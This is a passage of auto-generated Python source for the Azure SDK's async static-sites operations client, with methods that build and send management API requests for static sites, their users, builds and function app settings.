deserialized = self._deserialize('StaticSiteCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Web/staticSites'} # type: ignore
def get_static_sites_by_resource_group(
self,
resource_group_name: str,
**kwargs
) -> AsyncIterable["_models.StaticSiteCollection"]:
"""Gets all static sites in the specified resource group.
Description for Gets all static sites in the specified resource group.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either StaticSiteCollection or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.StaticSiteCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_static_sites_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('StaticSiteCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_static_sites_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites'} # type: ignore
async def get_static_site(
self,
resource_group_name: str,
name: str,
**kwargs
) -> "_models.StaticSiteARMResource":
"""Gets the details of a static site.
Description for Gets the details of a static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StaticSiteARMResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StaticSiteARMResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteARMResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.get_static_site.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('StaticSiteARMResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_static_site.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}'} # type: ignore
async def create_or_update_static_site(
self,
resource_group_name: str,
name: str,
static_site_envelope: "_models.StaticSiteARMResource",
**kwargs
) -> "_models.StaticSiteARMResource":
"""Creates a new static site in an existing resource group, or updates an existing static site.
Description for Creates a new static site in an existing resource group, or updates an existing
static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site to create or update.
:type name: str
:param static_site_envelope: A JSON representation of the staticsite properties. See example.
:type static_site_envelope: ~azure.mgmt.web.v2020_09_01.models.StaticSiteARMResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StaticSiteARMResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StaticSiteARMResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteARMResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update_static_site.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(static_site_envelope, 'StaticSiteARMResource')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('StaticSiteARMResource', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('StaticSiteARMResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
create_or_update_static_site.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}'} # type: ignore
async def delete_static_site(
self,
resource_group_name: str,
name: str,
**kwargs
) -> None:
"""Deletes a static site.
Description for Deletes a static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site to delete.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.delete_static_site.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_static_site.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}'} # type: ignore
async def update_static_site(
self,
resource_group_name: str,
name: str,
static_site_envelope: "_models.StaticSitePatchResource",
**kwargs
) -> "_models.StaticSiteARMResource":
"""Creates a new static site in an existing resource group, or updates an existing static site.
Description for Creates a new static site in an existing resource group, or updates an existing
static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site to create or update.
:type name: str
:param static_site_envelope: A JSON representation of the staticsite properties. See example.
:type static_site_envelope: ~azure.mgmt.web.v2020_09_01.models.StaticSitePatchResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StaticSiteARMResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StaticSiteARMResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteARMResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_static_site.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(static_site_envelope, 'StaticSitePatchResource')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('StaticSiteARMResource', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('StaticSiteARMResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_static_site.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}'} # type: ignore
def list_static_site_users(
self,
resource_group_name: str,
name: str,
authprovider: str,
**kwargs
) -> AsyncIterable["_models.StaticSiteUserCollection"]:
"""Gets the list of users of a static site.
Description for Gets the list of users of a static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param authprovider: The auth provider for the users.
:type authprovider: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either StaticSiteUserCollection or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.StaticSiteUserCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteUserCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_static_site_users.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'authprovider': self._serialize.url("authprovider", authprovider, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.post(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('StaticSiteUserCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_static_site_users.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/authproviders/{authprovider}/listUsers'} # type: ignore
async def delete_static_site_user(
self,
resource_group_name: str,
name: str,
authprovider: str,
userid: str,
**kwargs
) -> None:
"""Deletes the user entry from the static site.
Description for Deletes the user entry from the static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the staticsite.
:type name: str
:param authprovider: The auth provider for this user.
:type authprovider: str
:param userid: The user id of the user.
:type userid: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.delete_static_site_user.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'authprovider': self._serialize.url("authprovider", authprovider, 'str'),
'userid': self._serialize.url("userid", userid, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_static_site_user.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/authproviders/{authprovider}/users/{userid}'} # type: ignore
async def update_static_site_user(
self,
resource_group_name: str,
name: str,
authprovider: str,
userid: str,
static_site_user_envelope: "_models.StaticSiteUserARMResource",
**kwargs
) -> "_models.StaticSiteUserARMResource":
"""Updates a user entry with the listed roles.
Description for Updates a user entry with the listed roles.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param authprovider: The auth provider for this user.
:type authprovider: str
:param userid: The user id of the user.
:type userid: str
:param static_site_user_envelope: A JSON representation of the StaticSiteUser properties. See
example.
:type static_site_user_envelope: ~azure.mgmt.web.v2020_09_01.models.StaticSiteUserARMResource
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StaticSiteUserARMResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StaticSiteUserARMResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteUserARMResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.update_static_site_user.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'authprovider': self._serialize.url("authprovider", authprovider, 'str'),
'userid': self._serialize.url("userid", userid, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(static_site_user_envelope, 'StaticSiteUserARMResource')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('StaticSiteUserARMResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
update_static_site_user.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/authproviders/{authprovider}/users/{userid}'} # type: ignore
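# Illustrative usage sketch, not part of the generated client: it assumes the async
# WebSiteManagementClient (azure.mgmt.web.aio) exposes this operations group as
# `static_sites` and that StaticSiteUserARMResource accepts a `roles` value.
#
#   from azure.identity.aio import DefaultAzureCredential
#   from azure.mgmt.web.aio import WebSiteManagementClient
#   from azure.mgmt.web.v2020_09_01.models import StaticSiteUserARMResource
#
#   async with WebSiteManagementClient(DefaultAzureCredential(), "<subscription-id>") as client:
#       user = await client.static_sites.update_static_site_user(
#           "my-rg", "my-static-site", "github", "<user-id>",
#           StaticSiteUserARMResource(roles="contributor"))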
def get_static_site_builds(
self,
resource_group_name: str,
name: str,
**kwargs
) -> AsyncIterable["_models.StaticSiteBuildCollection"]:
"""Gets all static site builds for a particular static site.
Description for Gets all static site builds for a particular static site.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator-like instance of either StaticSiteBuildCollection or the result of cls(response)
:rtype: ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.web.v2020_09_01.models.StaticSiteBuildCollection]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteBuildCollection"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.get_static_site_builds.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize('StaticSiteBuildCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.DefaultErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
get_static_site_builds.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/builds'} # type: ignore
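# Illustrative sketch (client setup as in the earlier example): get_static_site_builds
# returns an AsyncItemPaged, so the builds are consumed with `async for`.
#
#   async for build in client.static_sites.get_static_site_builds("my-rg", "my-static-site"):
#       print(build.name)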
async def get_static_site_build(
self,
resource_group_name: str,
name: str,
pr_id: str,
**kwargs
) -> "_models.StaticSiteBuildARMResource":
"""Gets the details of a static site build.
Description for Gets the details of a static site build.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param pr_id: The stage site identifier.
:type pr_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StaticSiteBuildARMResource, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StaticSiteBuildARMResource
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StaticSiteBuildARMResource"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.get_static_site_build.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'prId': self._serialize.url("pr_id", pr_id, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('StaticSiteBuildARMResource', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_static_site_build.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/builds/{prId}'} # type: ignore
async def delete_static_site_build(
self,
resource_group_name: str,
name: str,
pr_id: str,
**kwargs
) -> None:
"""Deletes a static site build.
Description for Deletes a static site build.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param pr_id: The stage site identifier.
:type pr_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
accept = "application/json"
# Construct URL
url = self.delete_static_site_build.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'prId': self._serialize.url("pr_id", pr_id, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete_static_site_build.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/staticSites/{name}/builds/{prId}'} # type: ignore
async def create_or_update_static_site_build_function_app_settings(
self,
resource_group_name: str,
name: str,
pr_id: str,
app_settings: "_models.StringDictionary",
**kwargs
) -> "_models.StringDictionary":
"""Creates or updates the function app settings of a static site build.
Description for Creates or updates the function app settings of a static site build.
:param resource_group_name: Name of the resource group to which the resource belongs.
:type resource_group_name: str
:param name: Name of the static site.
:type name: str
:param pr_id: The stage site identifier.
:type pr_id: str
:param app_settings: The function app settings to create or update.
:type app_settings: ~azure.mgmt.web.v2020_09_01.models.StringDictionary
:keyword callable cls: A custom type or function that will be passed the direct response
:return: StringDictionary, or the result of cls(response)
:rtype: ~azure.mgmt.web.v2020_09_01.models.StringDictionary
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.StringDictionary"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-09-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.create_or_update_static_site_build_function_app_settings.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
'name': self._serialize.url("name", name, 'str'),
'prId': self._serialize.url("pr_id", pr_id, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(app_settings, 'StringDictionary')
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.DefaultErrorResponse, response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('StringDictionary', pipeline_response)
if response.status_code == 202:
deserialized = self._deserialize('StringDictionary', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
